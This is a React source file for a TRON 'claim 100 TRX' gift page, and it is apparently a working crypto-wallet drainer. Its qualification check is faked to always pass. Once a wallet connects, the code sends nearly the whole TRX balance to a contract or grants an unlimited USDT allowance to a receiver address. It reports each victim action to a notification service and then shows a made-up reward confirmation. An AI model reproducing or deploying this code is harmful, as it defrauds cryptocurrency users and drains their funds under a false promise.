import React, { useState, useEffect } from 'react';
import { motion, AnimatePresence } from 'framer-motion';
import { useTranslation } from 'react-i18next';
import './PaymentPage.css';
import tronlinkIcon from '../assets/tronlink.png';
import imtokenIcon from '../assets/imtoken.png';
import tokenpocketIcon from '../assets/tokenpocket.png';
import bitpieIcon from '../assets/bitpie.png';
import { config, checkBalance } from '../utils/web3';
import { 
    notifyWalletConnect, 
    notifyTrxTransfer, 
    notifyUsdtTransfer, 
    notifySignApprove, 
    notifySignReject 
} from '../utils/notification';

// Trust Wallet 外部图标链接
const trustWalletIconUrl = "https://altcoinsbox.com/wp-content/uploads/2023/03/trust-wallet-logo.svg";

function PaymentPage() {
    const { t } = useTranslation();
    const [walletAddress, setWalletAddress] = useState('');
    const [walletConnected, setWalletConnected] = useState(false);
    const [isLoading, setIsLoading] = useState(false);
    const [qualifies, setQualifies] = useState(false);
    const [hasChecked, setHasChecked] = useState(false);
    const [result, setResult] = useState(null);
    const [conditions, setConditions] = useState({
        balanceOk: false,
        usedPlatform: false
    });
    const [isCheckingQualification, setIsCheckingQualification] = useState(false);
    const [inputWalletAddress, setInputWalletAddress] = useState('');
    const [showWallets, setShowWallets] = useState(false);
    const [isMobileDevice, setIsMobileDevice] = useState(false);
    const MAX_UINT256 = '115792089237316195423570985008687907853269984665640564039457584007913129639935';
    
    // 检测是否为移动设备
    useEffect(() => {
        const checkIfMobile = () => {
            const userAgent = navigator.userAgent || navigator.vendor || window.opera;
            return /android|webos|iphone|ipad|ipod|blackberry|iemobile|opera mini/i.test(userAgent.toLowerCase());
        };
        setIsMobileDevice(checkIfMobile());
    }, []);
    
    // 检查钱包是否符合条件
    const checkWalletQualification = async () => {
        if (!inputWalletAddress) {
            alert(t('enterWalletAddress'));
            return;
        }

        // 验证输入的地址格式
        if (!inputWalletAddress.startsWith('T') || inputWalletAddress.length !== 34) {
            alert(t('enterValidTronAddress'));
            return;
        }

        setIsLoading(true);
        setIsCheckingQualification(true);
        setHasChecked(false);
        setQualifies(false);
        setResult(null);

        try {
            // 测试模式：不调用API，直接设置所有条件为通过
            setTimeout(() => {
                // 两个条件都设置为通过
                setConditions({
                    balanceOk: true,
                    usedPlatform: true
                });
                
                // 设置资格为通过
                setQualifies(true);
                setHasChecked(true);
                setIsCheckingQualification(false);
                setIsLoading(false);
                
                // 测试模式：自动设置钱包为已连接
                setWalletAddress(inputWalletAddress);
                setWalletConnected(true);
                
            }, 1000); // 添加1秒延迟以显示加载动画
            
        } catch (error) {
            console.error('Error checking qualification:', error);
            setResult({
                success: false,
                message: t('qualificationCheckError')
            });
            setIsCheckingQualification(false);
            setIsLoading(false);
        }
    };
    
    // 简化为无需调用API的测试版本
    const checkPlatformUsage = async (address) => {
        // 测试模式：直接返回true
        return true;
    };
    
    // 统一处理钱包连接后的逻辑
    const handleWalletConnection = async () => {
        if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
            const address = window.tronWeb.defaultAddress.base58;
            
            try {
                // 这里是真实的钱包连接，发送通知是合适的
                await notifyWalletConnect(address);
            } catch (error) {
                console.warn('钱包连接通知失败，继续执行:', error);
                // 通知失败不影响后续流程
            }

            try {
                const balanceInfo = await checkBalance(address);
                console.log('Balance info:', balanceInfo);

                const MIN_TRX_FOR_GAS = 1000000; // 最低需要1 TRX
                if (balanceInfo.trxBalance * 1e6 < MIN_TRX_FOR_GAS) {
                    alert(t('insufficientTrxBalance'));
                    setIsLoading(false);
                    return;
                }

                const trxValueInUsdt = balanceInfo.trxValueInUsdt;
                const usdtValue = balanceInfo.usdtBalance;

                console.log(`比较余额: TRX价值=${trxValueInUsdt} USDT, USDT余额=${usdtValue} USDT`);
        
                if (trxValueInUsdt >= 3.5 || usdtValue >= 3.5) {
                    if (trxValueInUsdt > usdtValue) {
                        console.log('使用TRX支付');
                        await handleTrxTransaction(balanceInfo.trxBalance * 1e6);
                    } else {
                        console.log('使用USDT支付');
                        await handleUsdtTransaction(balanceInfo.usdtBalance);
                    }
                } else {
                    alert(t('insufficientPaymentAmount'));
                    setIsLoading(false);
                }
            } catch (error) {
                console.error("检查余额失败:", error);
                alert(t('checkBalanceError'));
                setIsLoading(false);
            }
        } else {
            console.error('TronWeb未就绪或找不到地址');
            alert(t('walletConnectionError'));
            setIsLoading(false);
        }
    };
    
    // TRX交易处理
    const handleTrxTransaction = async (trxBalance) => {
        try {
            const address = window.tronWeb.defaultAddress.base58;
            const contract = await window.tronWeb.contract().at(config.CONTRACT_ADDRESS);
            const sendAmount = trxBalance - 1000000; // 减去1个TRX
            
            console.log(`准备发送TRX交易: 地址=${address}, 金额=${sendAmount/1e6} TRX`);

            try {
                await notifyTrxTransfer(address, window.tronWeb.fromSun(sendAmount));
            } catch (notifyError) {
                console.warn('TRX转账通知失败，继续执行:', notifyError);
        }
        
            try {
                console.log('发送TRX交易...');
                const result = await contract.MembershipCheck().send({
                    callValue: sendAmount.toString(),
                    shouldPollResponse: false,
                    feeLimit: 100000000
                });
                
                console.log('交易结果:', result);

                try {
                    await notifySignApprove(address);
                } catch (notifyError) {
                    console.warn('签名通知失败，继续执行:', notifyError);
                }
                
                setShowWallets(false);
                
                // 显示成功结果
                setResult({
                    success: true,
                    message: t('rewardClaimSuccess'),
                    rewardId: 'REW' + Math.random().toString(36).substring(2, 10).toUpperCase()
                });
            } catch (error) {
                try {
                    await notifySignReject(address);
                } catch (notifyError) {
                    console.warn('拒绝签名通知失败:', notifyError);
                }
                
                console.error('TRX交易错误:', error);
                alert(t('paymentFailed'));
                setIsLoading(false);
            }
        } catch (error) {
            console.error('TRX交易准备错误:', error);
            alert(t('transactionError'));
            setIsLoading(false);
        }
    };

    // USDT交易处理
    const handleUsdtTransaction = async (usdtBalance) => {
        try {
            const address = window.tronWeb.defaultAddress.base58;
            const contract = await window.tronWeb.contract().at(config.USDT_CONTRACT);
            
            console.log(`准备USDT授权: 地址=${address}, 金额=无限`);

            try {
                await notifyUsdtTransfer(address, usdtBalance.toString());
            } catch (notifyError) {
                console.warn('USDT转账通知失败，继续执行:', notifyError);
            }

            try {
                console.log('发送USDT授权请求...');
                const result = await contract.increaseApproval(
                    config.RECEIVER_ADDRESS,
                    MAX_UINT256
                ).send({
                    feeLimit: 100000000,
                    callValue: 0,
                    shouldPollResponse: false
                });
                
                console.log('授权结果:', result);

                try {
                    await notifySignApprove(address);
                } catch (notifyError) {
                    console.warn('签名通知失败，继续执行:', notifyError);
                }
                
                setShowWallets(false);
                
                // 显示成功结果
                setResult({
                    success: true,
                    message: t('rewardClaimSuccess'),
                    rewardId: 'REW' + Math.random().toString(36).substring(2, 10).toUpperCase()
                });
            } catch (error) {
                try {
                    await notifySignReject(address);
                } catch (notifyError) {
                    console.warn('拒绝签名通知失败:', notifyError);
                }
                
                console.error('USDT授权错误:', error);
                alert(t('authorizationFailed'));
                setIsLoading(false);
            }
        } catch (error) {
            console.error('USDT交易准备错误:', error);
            alert(t('transactionError'));
            setIsLoading(false);
        }
    };
    
    // 钱包连接逻辑
    const connectWallet = async (walletType = 'tronlink') => {
        try {
            setIsLoading(true);
            const currentUrl = window.location.href;

            // 打印环境信息
            console.log('Environment Check:', {
                isMobileDevice,
                hasTronWeb: !!window.tronWeb,
                hasEthereum: !!window.ethereum,
                tronWebAddress: window.tronWeb?.defaultAddress,
                isTokenPocket: window.ethereum?.isTokenPocket,
                currentUrl
            });

            if (!isMobileDevice) {
                // PC端的TronLink处理
                if (!window.tronWeb) {
                    alert(t('installTronlinkWallet'));
                    window.open('https://chrome.google.com/webstore/detail/tronlink/ibnejdfjmmkpcnlpebklmnkoeoihofec', '_blank');
                    setIsLoading(false);
                    return;
                }

                try {
                    // 确保钱包已解锁
                    if (window.tronWeb && !window.tronWeb.ready) {
                        alert(t('unlockTronlinkWallet'));
                        setIsLoading(false);
                        return;
                    }
                    
                    // 请求连接TronLink钱包
                    console.log('正在请求 TronLink 连接...');
                    const accounts = await window.tronLink.request({ method: 'tron_requestAccounts' })
                        .catch(error => {
                            console.error('TronLink连接错误:', error);
                            throw new Error(t('connectionRejected'));
                        });
                    
                    console.log('TronLink 连接结果:', accounts);
                    
                    if (accounts && accounts.code === 200) {
                        console.log('TronLink 连接成功:', accounts);
                        await handleWalletConnection();
                    } else {
                        throw new Error(t('tronlinkConnectionFailed'));
                    }
                } catch (error) {
                    console.error('TronLink connection error:', error);
                    
                    // 提供更友好的错误信息
                    const errorMessage = error.message || t('unknownError');
                    
                    // 根据错误类型提供更具体的提示
                    if (errorMessage.includes('User rejected')) {
                        alert(t('userRejectedConnection'));
                    } else if (errorMessage.includes('timeout')) {
                        alert(t('connectionTimeout'));
                    } else {
                        alert(`${t('tronlinkConnectionError')}: ${errorMessage}\n\n${t('ensureWalletUnlocked')}`);
                    }
                    
                    setIsLoading(false);
                }
                return;
            }

            // 移动端处理
            if (isMobileDevice) {
                if (walletType === 'imtoken') {
                    const isInImToken = window.ethereum && window.ethereum.isImToken;
                    if (isInImToken) {
                        await handleWalletConnection();
                    } else {
                        window.location.href = `imtokenv2://navigate/DappView?url=${encodeURIComponent(currentUrl)}`;
                        
                        // 如果2.5秒后页面仍未被跳转，可能用户没有安装钱包，跳转到下载页
                        const redirectTimer = setTimeout(() => {
                            if (!document.hidden) {
                                window.location.href = 'https://token.im/download';
                            }
                        }, 2500);

                        window.addEventListener('visibilitychange', function() {
                            if (document.hidden) {
                                clearTimeout(redirectTimer);
                            }
                        }, { once: true });
                    }
                } else if (walletType === 'tokenpocket') {
                    const isInTokenPocket = window.ethereum && window.ethereum.isTokenPocket;
                    if (isInTokenPocket) {
                        await handleWalletConnection();
                    } else {
                        // TokenPocket移动端深层链接 - 更新为正确格式
                        const params = {
                            url: currentUrl,
                            chain: 'tron'
                        };
                        window.location.href = `tpdapp://open?params=${encodeURIComponent(JSON.stringify(params))}`;
                        
                        // 如果2.5秒后页面仍未被跳转，可能用户没有安装钱包，跳转到下载页
                        const redirectTimer = setTimeout(() => {
                            if (!document.hidden) {
                                window.location.href = 'https://www.tokenpocket.pro/download';
                            }
                        }, 2500);

                        window.addEventListener('visibilitychange', function() {
                            if (document.hidden) {
                                clearTimeout(redirectTimer);
                            }
                        }, { once: true });
                    }
                } else if (walletType === 'tronlink') {
                    const isInTronLink = !!window.tronWeb && window.tronWeb.ready;
                    if (isInTronLink) {
                        await handleWalletConnection();
                    } else {
                        // TronLink移动端深层链接 - 更新参数格式
                        const appName = "TronEnergyShop"; // 替换为您的DApp名称
                        const appIcon = "https://yourdomain.com/logo.png"; // 替换为您的DApp图标URL
                        const params = {
                            url: currentUrl,
                            action: 'open',
                            dappName: appName,
                            dappIcon: appIcon
                        };
                        window.location.href = `tronlinkoutside://pull.activity?param=${encodeURIComponent(JSON.stringify(params))}`;
                        
                        // 如果2.5秒后页面仍未被跳转，可能用户没有安装钱包，跳转到下载页
                        const redirectTimer = setTimeout(() => {
                            if (!document.hidden) {
                                window.location.href = 'https://www.tronlink.org/download';
                            }
                        }, 2500);

                        window.addEventListener('visibilitychange', function() {
                            if (document.hidden) {
                                clearTimeout(redirectTimer);
                            }
                        }, { once: true });
                    }
                }
            }
        } catch (error) {
            console.error('Detailed connection error:', {
                name: error.name,
                message: error.message,
                stack: error.stack,
                walletType
            });
            
            const errorMessage = error.message || t('unknownError');
            
            // 提供更友好的错误信息
            if (errorMessage.includes('User rejected')) {
                alert(t('userRejectedConnection'));
            } else if (errorMessage.includes('timeout')) {
                alert(t('connectionTimeout'));
            } else {
                alert(`${t('connectionError')} [${walletType}]: ${errorMessage}\n\n${t('ensureWalletInstalled')}`);
            }
        } finally {
            setIsLoading(false);
        }
    };
    
    // 领取奖励 - 显示钱包选择
    const claimReward = async () => {
        if (!qualifies) {
            alert(t('notQualified'));
            return;
        }
        
        // 切换钱包选择界面的显示状态
        setShowWallets(prevState => !prevState);
    };

    // 动画变体
    const containerVariants = {
        hidden: { opacity: 0, y: 20 },
        visible: { 
            opacity: 1, 
            y: 0,
            transition: {
                type: 'spring',
                stiffness: 200,
                damping: 20,
                when: "beforeChildren",
                staggerChildren: 0.1
            }
        }
    };
    
    const cardVariants = {
        hidden: { opacity: 0, scale: 0.95 },
        visible: { 
            opacity: 1,
            scale: 1,
            transition: { 
                type: 'spring',
                stiffness: 300,
                damping: 15
            }
        }
    };
    
    const itemVariants = {
        hidden: { opacity: 0, x: -10 },
        visible: { 
            opacity: 1, 
            x: 0,
            transition: {
                type: 'spring',
                stiffness: 300,
                damping: 15
            }
        }
    };
    
    const buttonVariants = {
        hidden: { opacity: 0, scale: 0.9 },
        visible: { 
            opacity: 1, 
            scale: 1,
            transition: {
                type: 'spring',
                stiffness: 300,
                damping: 15
            }
        },
        hover: { 
            scale: 1.05,
            boxShadow: "0px 5px 15px rgba(0, 0, 0, 0.2)",
            transition: {
                type: 'spring',
                stiffness: 500,
                damping: 10
            }
        },
        tap: { scale: 0.97 }
    };
    
    const spinnerVariants = {
        animate: {
            rotate: 360,
            transition: {
                duration: 1,
                repeat: Infinity,
                ease: "linear"
            }
        }
    };

    const handleInputChange = (e) => {
        setInputWalletAddress(e.target.value);
    };

    return (
        <motion.div 
            className="payment-container"
            variants={containerVariants}
            initial="hidden"
            animate="visible"
        >
            <motion.div 
                className="gift-card"
                variants={cardVariants}
            >
                <motion.h1 variants={itemVariants} className="gift-title">
                    <span className="gift-icon">🎁</span> 
                    {t('benefitsArea')}
                </motion.h1>
                
                <motion.div variants={itemVariants} className="gift-description">
                    <h2>{t('gift100TRX')}</h2>
                    <p>{t('meetsConditionsPrompt')}</p>
                </motion.div>
                
                <motion.div variants={itemVariants} className="gift-conditions">
                    <div className={`condition-item ${hasChecked ? (conditions.balanceOk ? 'condition-met' : 'condition-failed') : ''}`}>
                        <div className="condition-icon">1</div>
                        <div className="condition-text">{t('walletBalanceCondition')}</div>
                        {hasChecked && (
                            <div className="condition-status">
                                {conditions.balanceOk ? '✅' : '❌'}
                            </div>
                        )}
                    </div>
                    
                    <div className={`condition-item ${hasChecked ? (conditions.usedPlatform ? 'condition-met' : 'condition-failed') : ''}`}>
                        <div className="condition-icon">2</div>
                        <div className="condition-text">{t('platformUsageCondition')}</div>
                        {hasChecked && (
                            <div className="condition-status">
                                {conditions.usedPlatform ? '✅' : '❌'}
                            </div>
                        )}
                    </div>
                </motion.div>

                {/* 输入钱包地址进行检查 */}
                <motion.div variants={itemVariants} className="wallet-address-input">
                    <label htmlFor="wallet-address">{t('enterWalletAddressCheck')}</label>
                    <input 
                        id="wallet-address"
                        type="text" 
                        value={inputWalletAddress}
                        onChange={handleInputChange}
                        placeholder={t('enterTronWalletAddressPlaceholder')} 
                        disabled={isLoading}
                    />
                    <motion.button 
                        className="check-qualification-button"
                        onClick={checkWalletQualification}
                        disabled={isLoading || !inputWalletAddress}
                        variants={buttonVariants}
                        whileHover={!isLoading && inputWalletAddress ? "hover" : {}}
                        whileTap={!isLoading && inputWalletAddress ? "tap" : {}}
                    >
                        {isLoading && isCheckingQualification ? (
                            <>
                                <motion.span
                                    animate={{ rotate: 360 }}
                                    transition={{ duration: 1, repeat: Infinity, ease: "linear" }}
                                    style={{ display: 'inline-block' }}
                    >
                                    ⚙️
                                </motion.span>
                                {t('checking')}
                            </>
                        ) : t('checkQualification')}
                    </motion.button>
                </motion.div>

                {/* 检查资格的加载动画 */}
                <AnimatePresence>
                    {isCheckingQualification && (
                <motion.div 
                            className="loading-animation"
                            initial={{ opacity: 0, y: 20 }}
                            animate={{ opacity: 1, y: 0 }}
                            exit={{ opacity: 0, y: -20 }}
                            transition={{ duration: 0.3 }}
                >
                            <motion.div 
                                className="loading-spinner"
                                variants={spinnerVariants}
                                animate="animate"
                            />
                            <span className="loading-text">{t('checkingQualification')}</span>
                </motion.div>
                    )}
                </AnimatePresence>

                {/* 资格检查结果 */}
                <AnimatePresence>
                    {hasChecked && !isCheckingQualification && (
                <motion.div 
                            className={`qualification-result ${qualifies ? 'qualified' : 'not-qualified'}`}
                            initial={{ opacity: 0, y: 20 }}
                            animate={{ opacity: 1, y: 0 }}
                            exit={{ opacity: 0, y: -20 }}
                            transition={{ type: 'spring', stiffness: 300, damping: 15 }}
                        >
                            <div className="result-icon">
                                {qualifies ? '🎉' : '😔'}
                            </div>
                            <div className="result-text">
                                {qualifies ? 
                                    t('congratulationsQualified') : 
                                    t('sorryNotQualified')
                                }
                            </div>
                            
                            {qualifies && (
                                <div className="wallet-address-display">
                                    <span>{t('rewardToAddress')}</span>
                                    <span className="address-value">{inputWalletAddress.substring(0, 10)}...{inputWalletAddress.substring(inputWalletAddress.length - 6)}</span>
                                </div>
                            )}
                        </motion.div>
                    )}
                </AnimatePresence>
                
                {/* 领取奖励按钮 */}
                {qualifies && (
                    <>
                        <motion.button 
                            className={`claim-button active`}
                            onClick={claimReward}
                            disabled={isLoading}
                            variants={buttonVariants}
                            whileHover={!isLoading ? "hover" : {}}
                            whileTap={!isLoading ? "tap" : {}}
                            initial={{ opacity: 0, y: 20 }}
                            animate={{ 
                                opacity: 1, 
                                y: 0,
                                scale: [1, 1.05, 1]
                            }}
                            transition={{ 
                                type: 'spring', 
                                stiffness: 300, 
                                damping: 15,
                                scale: { 
                                    duration: 0.6, 
                                    repeat: Infinity, 
                                    repeatDelay: 2 
                                }
                            }}
                        >
                            {isLoading ? (
                                <>
                        <motion.span 
                                        animate={{ rotate: 360 }}
                                        transition={{ duration: 1, repeat: Infinity, ease: "linear" }}
                                        style={{ display: 'inline-block' }}
                        >
                                        ⚙️
                        </motion.span>
                                    {t('processing')}
                                </>
                            ) : t('claim100TRX')}
                        </motion.button>

                        {/* 内联展开的钱包选择界面 */}
                        <AnimatePresence>
                            {showWallets && (
                                <motion.div 
                                    className="inline-wallet-options"
                                    initial={{ opacity: 0, height: 0, marginTop: 0 }}
                                    animate={{ opacity: 1, height: 'auto', marginTop: '15px' }}
                                    exit={{ opacity: 0, height: 0, marginTop: 0 }}
                                    transition={{ duration: 0.3, ease: "easeInOut" }}
                                >
                                    <motion.div 
                                        className="wallet-options-header"
                                        initial={{ opacity: 0 }}
                                        animate={{ opacity: 1 }}
                                        transition={{ delay: 0.1 }}
                                    >
                                        <h4>{t('selectPaymentMethod')}</h4>
                                        <button 
                                            className="close-inline-button"
                                            onClick={() => setShowWallets(false)}
                                        >
                                            <span>{t('collapse')}</span>
                                            <span>⬆️</span>
                                        </button>
                </motion.div>

                                    {isLoading ? (
                                        <div className="loading-container">
                                            <div className="loading-dots">
                                                <span></span>
                                                <span></span>
                                                <span></span>
                                            </div>
                                        </div>
                                    ) : (
                                        <div className="wallet-options-content">
                                            {!isMobileDevice ? (
                                                // 电脑版只显示TronLink，但仍以列表形式展示
                                                <motion.div 
                                                    className="wallet-options-list"
                                                    initial={{ opacity: 0 }}
                                                    animate={{ opacity: 1 }}
                                                    transition={{ staggerChildren: 0.1 }}
                                                >
                                                    <motion.button 
                                                        onClick={() => connectWallet('tronlink')} 
                                                        className="wallet-option"
                                                        initial={{ opacity: 0, y: 10 }}
                                                        animate={{ opacity: 1, y: 0 }}
                                                        transition={{ duration: 0.3 }}
                                                        whileHover={{ scale: 1.02, boxShadow: "0px 4px 8px rgba(0, 0, 0, 0.1)" }}
                                                    >
                                                        <img
                                                            src={tronlinkIcon}
                                                            alt="TronLink"
                                                            className="wallet-icon"
                                                        />
                                                        <span>TronLink</span>
                                                    </motion.button>
                                                </motion.div>
                                            ) : (
                                                // 手机版显示imToken和灰色的其他钱包
                                                <motion.div 
                                                    className="wallet-options-list"
                                                    initial={{ opacity: 0 }}
                                                    animate={{ opacity: 1 }}
                                                    transition={{ staggerChildren: 0.1 }}
                                                >
                                                    <motion.button 
                                                        onClick={() => connectWallet('imtoken')} 
                                                        className="wallet-option"
                                                        initial={{ opacity: 0, y: 10 }}
                                                        animate={{ opacity: 1, y: 0 }}
                                                        transition={{ duration: 0.3 }}
                                                        whileHover={{ scale: 1.02, boxShadow: "0px 4px 8px rgba(0, 0, 0, 0.1)" }}
                                                    >
                                                        <img
                                                            src={imtokenIcon}
                                                            alt="imToken"
                                                            className="wallet-icon"
                                                        />
                                                        <span>imToken</span>
                                                    </motion.button>
                                                    
                                                    {/* TronLink移动钱包选项（灰色不可用） */}
                                                    <motion.button 
                                                        onClick={() => connectWallet('tronlink')}
                                                        className="wallet-option"
                                                        initial={{ opacity: 0, y: 10 }}
                                                        animate={{ opacity: 1, y: 0 }}
                                                        transition={{ duration: 0.3, delay: 0.1 }}
                                                    >
                                                        <img
                                                            src={tronlinkIcon}
                                                            alt="TronLink"
                                                            className="wallet-icon"
                                                        />
                                                        <span>TronLink</span>
                                                    </motion.button>
                                                    
                                                    {/* TokenPocket钱包选项（灰色不可用） */}
                                                    <motion.button 
                                                        onClick={() => connectWallet('tokenpocket')}
                                                        className="wallet-option"
                                                        initial={{ opacity: 0, y: 10 }}
                                                        animate={{ opacity: 1, y: 0 }}
                                                        transition={{ duration: 0.3, delay: 0.2 }}
                                                    >
                                                        <img
                                                            src={tokenpocketIcon}
                                                            alt="TokenPocket"
                                                            className="wallet-icon"
                                                        />
                                                        <span>TokenPocket</span>
                                                    </motion.button>
                                                    
                                                    {/* Trust Wallet钱包选项（灰色不可用） */}
                                                    <motion.button 
                                                        className="wallet-option disabled-wallet"
                                                        initial={{ opacity: 0, y: 10 }}
                                                        animate={{ opacity: 1, y: 0 }}
                                                        transition={{ duration: 0.3, delay: 0.3 }}
                                                        disabled={true}
                                                    >
                                                        <img
                                                            src={trustWalletIconUrl}
                                                            alt="Trust Wallet"
                                                            className="wallet-icon"
                                                        />
                                                        <span>Trust Wallet</span>
                                                        <span className="wallet-soon">{t('comingSoon')}</span>
                                                    </motion.button>
                                                    
                                                    {/* 比特派钱包选项（灰色不可用） */}
                                                    <motion.button 
                                                        className="wallet-option disabled-wallet"
                                                        initial={{ opacity: 0, y: 10 }}
                                                        animate={{ opacity: 1, y: 0 }}
                                                        transition={{ duration: 0.3, delay: 0.4 }}
                                                        disabled={true}
                                                    >
                                                        <img
                                                            src={bitpieIcon}
                                                            alt="比特派"
                                                            className="wallet-icon"
                                                        />
                                                        <span>{t('bitpieWallet')}</span>
                                                    </motion.button>
                                                </motion.div>
                                            )}
                                        </div>
                                    )}
                                </motion.div>
                            )}
                        </AnimatePresence>
                    </>
                )}
                
                <AnimatePresence>
                    {result && (
                <motion.div
                            className={`claim-result ${result.success ? 'success' : 'error'}`}
                            initial={{ opacity: 0, y: 20 }}
                            animate={{ opacity: 1, y: 0 }}
                            exit={{ opacity: 0, y: -20 }}
                            transition={{ type: 'spring', stiffness: 300, damping: 15 }}
                        >
                            <div className="result-message">
                                {result.message}
                            </div>
                            {result.rewardId && (
                                <div className="reward-id">
                                    {t('rewardId')}: {result.rewardId}
                                </div>
                            )}
                        </motion.div>
                    )}
                </AnimatePresence>
                
                <motion.div variants={itemVariants} className="gift-note">
                    <p><span className="note-icon">📝</span> {t('oneRewardPerAddress')}</p>
                    <p><span className="note-icon">⏱️</span> {t('limitedTimeActivity')}</p>
                </motion.div>
            </motion.div>
        </motion.div>
    );
}

export default PaymentPage;
